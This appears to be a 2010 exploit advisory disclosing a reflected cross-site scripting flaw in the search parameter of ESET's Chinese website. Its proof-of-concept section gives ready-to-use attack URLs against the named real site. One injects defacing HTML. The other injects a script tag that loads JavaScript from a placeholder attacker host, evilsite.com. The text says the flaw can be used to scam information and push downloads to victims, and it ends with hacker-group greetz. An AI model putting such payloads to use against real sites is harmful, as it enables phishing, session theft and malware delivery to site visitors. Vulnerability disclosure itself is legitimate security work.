.___________  ________  http://www.nod32.com.cn
____   ____   __| _/\_____  \ \_____  \    ____   ____
/    \ /  _ \ / __ |   _(__  <  /  ____/   _/ ___\ /    \
|   |  (  <_> ) /_/ |  /       \/       \   \  \___|   |  \
|___|  /\____/\____ | /______  /\_______ \ / \___  >___|  /
\/            \/        \/         \/ \/   \/     \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting

â€”â€”â€”â€”â€”â€”â€”â€”-
1. INFORMATION          |
â€”â€”â€”â€”â€”â€”â€”â€”-
Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

â€”â€”â€”â€”â€”â€”â€”â€”-
2. DESCRIPTION          |
â€”â€”â€”â€”â€”â€”â€”â€”-

http;//www.nod32.com.cn suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victimâ€™s PC.

â€”â€”â€”â€”â€”â€”â€”â€”-
3. PROOF OF CONCEPT     |
â€”â€”â€”â€”â€”â€”â€”â€”-
Display a message using HTML:

http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=

Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=<script src=â€http://www.evilsite.com/foo.jsâ€><h2>Error</h2>&btnG=

â€”â€”â€”â€”â€”â€”â€”â€”-
4. GREETZ               |
â€”â€”â€”â€”â€”â€”â€”â€”-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

â€”â€”â€”â€”â€”â€”â€”â€”-
5. CONTACT              |
â€”â€”â€”â€”â€”â€”â€”â€”-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 â€“ http://greyhathackers.wordpress.com â€“ Sora